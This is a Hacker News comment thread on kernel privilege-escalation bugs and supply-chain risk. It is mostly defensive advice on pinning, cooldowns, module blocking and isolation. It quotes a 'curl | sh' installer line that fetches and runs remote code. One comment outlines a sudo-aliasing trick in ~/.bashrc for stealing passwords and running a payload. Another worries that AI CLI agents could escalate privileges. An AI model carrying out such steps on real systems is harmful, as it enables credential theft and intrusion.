I installed LuLu recently and it's been nice to have that extra peace of mind. Obviously it's not a silver bullet, but it is a nice tool to have as part of a broader defensive, preventative posture.

I'm not associated with the project in any way and am very much open to other suggestions, either as an alternative to LuLu or to complement it.

https://objective-see.org/products/lulu.html

1a527dd5 a day ago

This applies to much more than just software, in fact it applies to almost everything.

I don't remember where I read it, but it basically boils down to need vs want.

I've used that rule for deciding between a new car or used. A fancy vacuum or basic.

A shiny new gadget.

Bringing new things into the tech stack.

Picking a new tech stack.

leonidasv a day ago

The post is about Linux vulnerabilities, but given the recent supply chain attacks, I'd be especially careful with Homebrew: https://x.com/i/status/2052106143271354859

  • nomilk a day ago

    Often convenience and security are at odds, but `export HOMEBREW_NO_AUTO_UPDATE=1` is more convenient and more secure.

    • cromka a day ago

      The problem here is that Brew does things in an anti-Unix way by default, the auto-updating of packages being the most prominent example.

      I personally switched away from macOS partly for this reason, after realizing brew would eventually compromise my system with these antics.

moebrowne a day ago

For anyone who is running an out-of-support version of Ubuntu (20.04 and lower), I highly recommend Ubuntu Pro. It gives access to updates and is free for personal use.
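
For reference, attaching a machine is a couple of commands (a sketch; the token comes from your Ubuntu One account, and `esm-infra` is the part that extends security updates):

    # Token from ubuntu.com/pro; the free personal tier covers 5 machines
    sudo pro attach <your-token>
    sudo pro enable esm-infra
    sudo pro status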

mghackerlady 20 hours ago

Or just install OpenBSD (or FreeBSD, if you're willing to sacrifice a chunk of security for nvidia, jails, and bhyve).

happyPersonR 16 hours ago

With mandatory auto-updates, and software that doesn't pin dependencies being the norm, most of us have no choice in the matter really.

We're not manually downloading and installing new firmware; for a lot of things, it's all getting pulled in automatically.

looneysquash 18 hours ago

That sounds like it wouldn't scale. If everyone did it, then it would just delay things.

  • abustamam 18 hours ago

    True, but not everyone will do it. The intention isn't to scale, it's to save your own ass.

mobeigi a day ago

I saw a recent post about only adopting packages a certain number of days after release (say +3 or +7 days). The idea is you never bring in fresh releases, only older ones. This would also need dangerous or bad releases to be marked as vulnerable.

It means you skip supply chain attacks but may miss fresh vulnerability patches too.
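
That was probably about the cooldown settings package managers have started adding. pnpm, for instance, recently grew a built-in one; a sketch from memory (double-check the setting name and units against the pnpm docs for your version):

    # pnpm-workspace.yaml
    # Only resolve versions that have been public for at least 7 days
    minimumReleaseAge: 10080   # minutes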

  • mattstir 20 hours ago

    You only miss supply chain attacks that are eager to begin exploiting. If everyone begins waiting a week to update dependencies, attackers just need to wait 2 weeks before actively using their attack vectors.

clbrmbr a day ago

So what do we do? Pin our dependencies (to hashes when possible), and only update when there are CVEs?

But problem is this could lead to abuse of the CVE system to try to force rapid adoption of attacked packages. What prevents this?

  • papichulo2023 a day ago

    Run everything as sudo so they cant escalate any further ;)

    • clbrmbr a day ago

      Do you know if this exploit works on Docker containers? And if so, I assume it just allows escalation WITHIN the container? So this attack is scary for Linux desktops and servers, but a fully containerized system like common on CI/CD should be good. Right?

  • throawayonthe a day ago

    Nothing :D

tjansen a day ago

I wonder whether there is any tool that can prevent npm from downloading any package that has been published in the last month. While I miss out on possible fixes, this would prevent downloading some 3rd level dep that takes over my machine.

yurug a day ago

At some point, some people will rebuild an entire stack (all layers, from OS to applications) with proof-carrying code upgrades. Proof-code co-design and co-construction is the only way to execute code that you can trust.

alecco a day ago

Or disable algif_aead module as in https://news.ycombinator.com/item?id=47957409
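
If you go that route, a sketch of blocking the module (`blacklist` alone only stops auto-loading; the `install ... /bin/false` form also refuses explicit loads):

    # Refuse all future attempts to load the module
    echo 'install algif_aead /bin/false' | sudo tee /etc/modprobe.d/block-algif_aead.conf
    # Unload it if it's already in memory
    sudo modprobe -r algif_aead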

mtam 20 hours ago

Genuinely curious why tools like Chainguard are not more prevalent. I am sure there are open source alternatives for it too.

junto 16 hours ago

Reminds me of the old adage “I don’t need to outrun the bear. I just need to outrun you.”

Once everyone takes the stance of waiting 2 weeks, we are all back to the same situation.

I don’t like the suggestion to “wait for others to be the unfortunate victims, so that I can benefit from their misfortune”.

Surely there’s a better way.

vga1 a day ago

Maybe you should install new kernels at least though.

dzonga 16 hours ago

Instead of downloading software via npm (with the risk of your computer being taken over), there's a secure option provided by the web: no build step, just scripts at the top/bottom of the page.

They're executed in a secure sandbox.

Schlagbohrer 13 hours ago

I juuuuuust updated npm, should i be worried?

pjmlp a day ago

Remember the whole discussion when UNIX was supposed to not need anti-virus and talking down PCs?

Behaviours matter more than OS security primitives.

  • jeroenhd a day ago

    The whole (mistaken) belief that Linux and macOS didn't require AV was based on the execute bit being present, something Microsoft addressed back in XP by marking downloaded files as such and preventing them from being opened trivially.

    If you have code execution, you can attack the OS.

    • pjmlp a day ago

      Indeed, when one installs dependencies all over the Internet, or even better, key projects use "curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh" as default suggestion on how to install them, attackers have the work done for them.

      • 1718627440 a day ago

        > key projects use "curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh" as default suggestion

        This is exactly why some (including me) don't take these projects seriously. Like you claim to design a language for security, and this is how you tell me to install it????

        • TeamDman 21 hours ago

          What alternative do you propose for downloading binaries off the internet, placing them in the "right spot" and doing post-install operations like updating PATH that dont have gotchas equivalent to running "untrusted" code like curl|sh?

          • 1718627440 20 hours ago

            The one that is the norm on Linux distros and nearly all mobile OSes: signed packages. 'curl | sh' doesn't even let you inspect the package during or after installation.

        • pocksuppet 20 hours ago

          Downloading some code from the internet and running it is a very normal way to install software.

          curl|sh has the truncated shell script concern. It's possible to mitigate this concern. Did they? If so, it's no different from downloading and running any other installer.
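
          And if you'd rather not run it blind, the usual pattern is to separate the download from the execution (using rustup as the example):

              # Download first, read it, then decide to run it
              curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs -o rustup-init.sh
              less rustup-init.sh
              sh rustup-init.sh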

thot_experiment a day ago

Speaking of which, LTT posted a video about a DDR pad, which triggered the sleeper-cell programming of my youth, and I opened up StepMania to play a few rounds. As I was shutting down the program I noticed the build info in the corner.

6-19-2005

My copy of StepMania is turning old enough to drink in about a month and it's still fantastic. Software updates are (mostly) a scam.

eskibars a day ago

"If it ain't broke, don't fix it" is its own area of risk that people often ignore

  • creesch a day ago

    Except that a lot of software likely is already broken in fun ways we currently don't know about. That is what makes it such a "fun" challenge. Supply chain attacks are one thing, but CVEs in already-released software that let other attackers in are another.

    As always, I know most of us work in IT, but things rarely are actually binary.

chubs a day ago

To mitigate supply chain attacks like this, I've taken to specifying exact versions in my Rust Cargo.toml, and when importing new crates I select the previous-to-latest version. Is this a reasonable mitigation? It bugs me that Swift deprecates the concept of specifying exact versions; it actively pushes you towards semver ranges, which leaves the door open to this.
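
For reference, exact pins in Cargo use the `=` operator; a bare "1.2.3" is treated as `^1.2.3` (the versions below are just illustrative):

    [dependencies]
    # "=" requires exactly this version; "1.0.190" alone allows any compatible 1.x
    serde = "=1.0.190"
    tokio = { version = "=1.35.1", features = ["full"] }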

  • mattstir 20 hours ago

    > select the previous-to-latest version

    For supply chain attacks that simply bide their time, or for dependencies which involve interacting with other subsystems, it's possible you miss a critical security update by doing this. Of course, the maintainers of the crates should yank known bad releases, but that's putting trust in a third-party that may have already been compromised.

  • kam 20 hours ago

    Cargo will still pick the latest for transitive dependencies that aren't explicitly specified in your Cargo.toml. This is what Cargo.lock is for.

grey-area a day ago

Alternatively, maybe you shouldn’t have so many dependencies.

xbar a day ago

It seems like this round of vulns is going to be significant. What is the right response?

  • Gigachad a day ago

    Personally I'm choosing to keep my home server behind a VPN and to enable Lockdown Mode on my phone and laptop for a while until the dust settles. As well as just limiting the software installed to trusted projects only.

    VM isolation would still be safe even with these kernel exploits.

harrouet 20 hours ago

If there is any lesson from the AI craze, it is that there is no going back on the pace of breach discoveries.

Sure, we've just been through an acceleration phase, and a wave of patches will follow before things settle. But where we used to find x zero-days per million LoC, we will now find 10x ZD/MLoC. [Hopefully detection will become part of CI, so that number may vary.]

So, we will have more disasters waiting to happen. Assume that they will happen.

My #1 recommendation is to curate a list of the auth tokens you use (keep the list, not the actual tokens, in a central place...) and be ready to rotate them as automatically as possible. You already have backups. Know how to rotate all your credentials.

Write some scripts. Get ready. It will happen.

tdeck a day ago

> Copy Fail 2: Electric Boogaloo

What are people thinking with these meme style vulnerability names? It's going to be hard to pitch "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2: Electric Boogaloo".

  • dgellow a day ago

    "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2". Problem solved

q3k a day ago

You don't need a kernel LPE to root a Linux developer machine.

Just alias sudo to sudo-but-also-keep-password-and-execute-a-payload in ~/.bashrc and wait up to 24 hours. Maybe also simulate some breakage by intercepting other commands and force the user to run 'sudo systemctl' or something sooner rather than later.

  • himata4113 a day ago

    This. This is something I don't understand: there are a billion ways to gain root once you control a user that regularly uses sudo.

    This is only scary for rootless containers, as it skips an isolation layer. But we've started shipping distroless containers, which are not vulnerable to this because they lack privilege escalation commands such as su or sudo.

    Never trust software to begin with; sandbox everything you can, and don't run it on your machine in the first place if possible.

    • BobbyTables2 a day ago

      I doubt your “distroless” container is any safer against this vulnerability.

      Infecting sudo just makes for a quick demo.

      If your container has different processes at different user ids, the exploit would still be effective.

      It would likely also be able to “modify” read only files mapped from the host.

      • himata4113 16 hours ago

        Distroless rootless containers don't have the syscalls enabled to do anything useful with this exploit.

    • 1718627440 a day ago

      First, if you control the account of the administrator, you already have a worst-case scenario. Second, this is why distros tell you not to use sudo this way. The purpose of sudo is to give some people the ability to run a very specific program with elevated privileges that wouldn't otherwise be allowed, while not granting them any other administrative rights. If you want someone to be an admin over the system, just give them the root password.

    • LeCompteSftware a day ago

      I agree that de facto the biggest security flaw in Linux is "okay I'm tired of getting interrupted all day assisting you, I know you're competent, I'll put you on the sudoers list."

      But there are a lot of academic and research institutions that actually do have good Linux user management. I worked at a pediatric hospital, and the RHEL HPC admins did not mess around in terms of who was allowed to access which patients' data. As someone who was not an admin, it was a huge pain and it should have been. So this bug has pretty serious implications, seems like anyone at that hospital can abscond with a lot of deidentified data. [research HPC not as sensitive as the clinical stuff, which I think was all Windows Server]

      • himata4113 a day ago

        I think we've already concluded that user isolation is not safe and shouldn't be trusted; that's why we've invested so hard in namespacing (containers). Users should only have what they need, if you really care about security and don't want to tolerate the overhead of virtualization-based security.

    • TacticalCoder a day ago

      > this, this is something I don't understand there are a billion ways to gain root once you control the user that regulary uses sudo.

      I won't go into all the details, but... it's totally possible to not have the sudo command (or similar) on a system at all and to have su with the setuid bit off.

      On my main desktop there's no sudo command, and there are zero binaries with the setuid bit set.

      The only way to get root involves an "out-of-band" access, from another computer, that is not on the regular network [1].

      This setup has worked for me for years. And years. And I very rarely need to be root on my desktop. When I do, I just use my out-of-band connection (from a tiny laptop whose only purpose is to perform root operations on my desktop).

      For example, today I logged in as root and blocked the three modules with the "dirty page" mitigation suggested by the person who reported the exploit.

      You're not faking sudo with a mockingbird on my machine. You're not using "su" from a regular user account. No userns either (no "insmod", no nothing).

      Note that it's still possible to have several non-root users logged in at once, but from one user account you cannot log in as another. You can, however, switch to TTY2, TTY3, etc. and log in as another user. And the whole XKCD about "get local account, get everything of importance" isn't valid in my case either.

      I'm not saying it's perfect but it's not as simple as "get a local shell, wait until user enters 'sudo', get root". No sudo, no su.

      It's brutally simple.

      And, best of all, it's a fully usable desktop: I've been using such a setup for years (I've also got servers, including at home, with Proxmox and VMs etc., but that's another topic).

      • theamk a day ago

        Do you install system-wide software at all? How do you configure it?

        That's my main reason to use "sudo" on the desktop.

        I suppose I could install every piece of software locally, either from source or via flatpak, but this is a lot of work and much harder than doing it the easy way and using global install via my distro. Plus, non-distro installs are much more likely to be out of date and contain vulnerabilities of their own.

      • himata4113 a day ago

        NixOS comes to mind, rootless Podman, Qubes OS.

        But they all have something in common: the issue is that your user is compromised, which means the applications running as that user are compromised. The only thing you gain is that you can still trust your system, i.e. you can trust that the system itself is not compromised, which is only relevant for infrastructure, since if your user is compromised you're already fucked. Multi-user setups with untrusted accounts are inherently insecure, and in infrastructure the blast radius might be thousands of users of the said service.

        the breakdown looks something like this:

          - you heavily compromise a single user <- exploit not relevant
          - you compromise a shared setup via a bad user to compromise a lot of users <- should never be used anymore, namespace isolation is the replacement
          - you somewhat compromise a lot of users via infra compromise <- where this hurts
      • FrinkleFrankle a day ago

        Would you mind sharing the relevant config?

      • q3k a day ago

        Yes, you are very special and smart. Good for you!

        Most people however aren't and will happily run sudo after an npm postinstall script tells them to apt-install turboencabulator for their new frontend framework to function.

        • 1718627440 a day ago

          You really can't protect against a malicious sysadmin. Let them be bitten, maybe they will be smarter next time.

  • cozzyd a day ago

    right, a bigger issue is multitenant systems, which are common in academia (I manage several such systems for various experiments). Now, we generally trust the users to not be malicious, but most don't get sudo, because physicists tend to think they know what they're doing when they don't really (except for me, of course).

    Something that concerns me more: I use things like gemini-cli or claude-cli via their own non-sudo accounts, with no ssh keys or anything, on my laptop, but an LPE means they can find a way around such restrictions if they feel like it (and they might).

  • Terr_ a day ago

    Perhaps, but it makes a huge difference if you're running the vulnerable code in a container or as a different user.

  • 1718627440 a day ago

    When you control the bashrc of some other person, it is already kind of game over.

marvinified a day ago

I've been doing a lot of that lately.

epolanski 11 hours ago

Is the current situation a positive for commercial Linux distros that focus on security?

leonidasrup a day ago

Maybe the new software should not have any errors. I know, I have higher expectations than the average commercial software customer.

  • Jean-Papoulos a day ago

    Of course, why didn't anyone think of that ? I bet if someone started to ship software that has no errors they'll make a huge amount of money, especially from all the people that are security-minded !

    Please grow a brain.

    • leonidasrup a day ago

      There is currently only one method to prove the absence of errors, and that method is not LLMs; it's formal verification. Currently very little formal verification is used in the software industry, mostly just static type checking.

fsflover a day ago

Alternatively, consider using Qubes OS, which isolates untrusted software using strong hardware virtualization. My daily driver, can't recommend it enough. Examples of usage patterns: https://doc.qubes-os.org/en/r4.3/user/how-to-guides/how-to-o...

bsenftner a day ago

This is why I avoid the entire JavaScript shitshow that is NPM and all that ecosystems nonsense. The population of users do not have the secondary considerations to be trusted, there will always be someone that does the worse and talks too many into following them. Then the "best practices" produce failures. What a shit show.

bicepjai a day ago

I still can’t believe people are ok with software updates every day. Looking at you Claude code

  • sshine a day ago

    It's a two-edged sword. You're damned if you do and damned if you don't update.

jauntywundrkind a day ago

I do wonder a bit what happens as standard practice becomes lagging more and more. Who is left that's looking, that's finding out?

  • ayuhito a day ago

    I think there’s already a big market of supply chain security companies that are proactively scanning dependencies for this sort of thing.

    They’re always racing to be the first one to write an article about a case.

  • cybercatgurrl a day ago

    You raise a really good point. If everyone is doing this at exactly the same lag, then attacks will eventually start hitting groups in sync, at the exact same time.

jbrooks84 a day ago

100% doing this, sadly

shevy-java 19 hours ago

> Outside of Linux kernel patches from your distro, I think it's probably a good idea to put a moratorium on installing new software for a week or so.

This makes no sense.

So, copy.fail refers to a Linux kernel problem, yes? A local instructor showed it to us, e.g. by using Python to become superuser.

Well ... does this mean that a computer system is useless because of that bug? No. Besides, people can patch it already, so while it is indeed a huge bug as such, it does not make people's computers useless at all.

But even ignoring this ... why would we now AVOID installing new software for a bit? What rationale is given here? The rationale given was "because of ... uhm ... npm supply chain attacks":

"Right now would be one of the best times for a supply chain attack via NPM to hit hard.

Outside of Linux kernel patches from your distro, I think it's probably a good idea to put a moratorium on installing new software for a week or so."

Well, many computer systems won't even have npm installed. Besides, if they do, they should be well aware of npm having had issues for such a long time. left-pad is still the funniest one of all time IMO, or among the top three. copy.fail is not funny; it is almost so simple that it is stupid, which kind of makes it an epic fail indeed, and that AI found it also kind of means that skynet won. Humans won't find as many weaknesses as AI skynet will. But just because of such an exploit and npm sucking, why would this mean I should arbitrarily stop compiling any new software? THAT MAKES ABSOLUTELY NO SENSE AT ALL. That "rationale" is not a rationale. That is just an opinion, without any real argument behind it.

If the issue is serious, patch the Linux kernel. End of story. No need for a "moratorium" on installing new software. The "for a bit" makes no more sense than "for 50 days" or any other arbitrary number. xeiaso is not THINKING here.

rvz a day ago

If you are on Linux that is.

bitfilped a day ago

Am I missing part of the article? This seems like 2 sentences saying "don't install anything cause some Linux LPEs came out." I don't understand why this is on the frontpage of HN.

  • xena 14 hours ago

    As the author of it I'm as confused as you are. It's frontpage number 68 for me, next time is ultimate nice.

ptrl600 a day ago

What if it's a really good bit?

cookiengineer a day ago

Fun fact: you still can't build the vllm container with updated dependencies since llmlite got pwned, either due to regression bugs or due to impossible transitive dependencies in the dependency tree that are not resolvable. There is just too much slopcode down the line, and too many dependencies relying on pinned, outdated (and unpublished) dependencies.

I switched to llama.cpp because of that.

To me it feels more and more that the slopcode world is the opposite philosophy of reproducible builds. It's like the anti methodology of how to work in that regard.

Before, everyone was publishing breaking changes in subminor versions because nobody adhered to any API versioning standards. Now it's every commit that can break things. That is not an improvement.

  • 2ndorderthought a day ago

    Write-only code is such a bad idea. No one is reviewing 20k-LoC PRs with 15 new dependencies in an afternoon. Sorry, it's just not happening; I don't care how many years you have been a software engineer. Yet that's the new thing and how we are all supposed to work, or else we are all Luddites.

    • perching_aix a day ago

      I'm personally waiting to be downgraded to simply being called "lazy".

      When I see pages of obviously generated prose being submitted as any kind of documentation, my eyes just glaze over. I feel so guilty sharing similar stuff too, though to my credit, at least I always lead with a self-written TLDR, the slop is just for reference. But it's so bad, like genuinely distressing tier. I don't want to read all that junk, and more and more gets produced.

      Prose type docs have always been my Achilles heel, and this is like the worst possible evolution of that.

      For a brief period in the past few weeks, they somehow managed to make a change to ChatGPT Thinking that made it succinct. The tone was super fact-oriented too. It was honestly like waking up from a fever dream.

  • cybercatgurrl a day ago

    slopcode is a pejorative that means nothing to me. if you have an actual criticism to make, then do it

grayhatter a day ago

I dislike FUD like this :/

Luker88 a day ago

Dammit, this is why nobody uses NixOS. Nothing works on it!

The copyFail didn't, the dirtyfrag doesn't.

This copyfail2 does modify /etc/passwd, but I can't `su - sick` as expected.

/s

  • Luker88 a day ago

    Slightly unrelated, but the portable way to execute stuff is via `/usr/bin/env`, not `/bin/bash`.

    I did try fixing the path to use nixos paths, but it was still unsuccessful. Did not really check further.

foo12bar a day ago

Don't install anything, use an LLM to write everything from scratch. It may have bugs, but no one will know how to exploit them, especially when closed source.

Code is cheap and is becoming cheaper by the day. We need new paradigms.

  • Wilder7977 a day ago

    So no external libraries for anything? Billions of lines of code that duplicate the same thing n-times across an organization?

    And the benefit is the obscurity of "no one will know how to exploit them"?

    No, thanks.

    • foo12bar a day ago

      Code is becoming so cheap that all you need is a bunch of APIs for hardware, and your computer will build to that spec. And you can define it in natural language.

  • pocksuppet 6 hours ago

    A remote LLM? Then the LLM vendor is installing things on your machine.

  • Gigachad a day ago

    LLMs have been used to scan binary blobs for exploits already. What would be more effective is a system designed with multiple layers of security so any one exploit is largely useless.

    • foo12bar a day ago

      They would have to have access to your individual binary in order to scan it. And you'd have to describe how to build a system with multiple layers of security generally, for most problems, because I don't see that as being possible.

  • randyrand a day ago

    Next: the back doors are written by the LLM!

mistyvales a day ago

Fedora upgrades have usually been great, but I jumped the gun on Fedora 44. Sound is completely dead, with no PipeWire service available and ALSA not responding. Firefox dies immediately if I open a new tab or right-click anywhere in the browser (including nightly builds). QEMU refuses to load. Maybe something got completely f'd in the upgrade process; I never had an issue before, having upgraded from Fedora 38 all the way to 43. I am too tired to investigate it all.

I know this is unrelated to the article, but related to the title.

  • dralley a day ago

    I have had none of those issues on Fedora 44, FWIW.

  • circularfoyers a day ago

    If this is still the same install that you've been using since 38, you might find a clean install resolves some issues (whether or not your upgrade got botched). Also helps me get rid of software I installed that I don't use anymore, which I feel is relevant to this article. But part of why I love Silverblue so much is I don't have to worry about upgrades getting botched and fwiw as well, I haven't noticed any of those bugs on 44 across several very different machines.

  • cevn a day ago

    I had a day-1 crash loop with KWin on the 2nd desktop, but on day 2 some package update fixed it. Honestly, it isn't the first time Fedora upgrades have messed something up for me either, but I do think it's more stable than the average Ubuntu release; not that I've upgraded Ubuntu in like 5 years.

  • tokkkie a day ago

    Fedora 44 here, no issues.
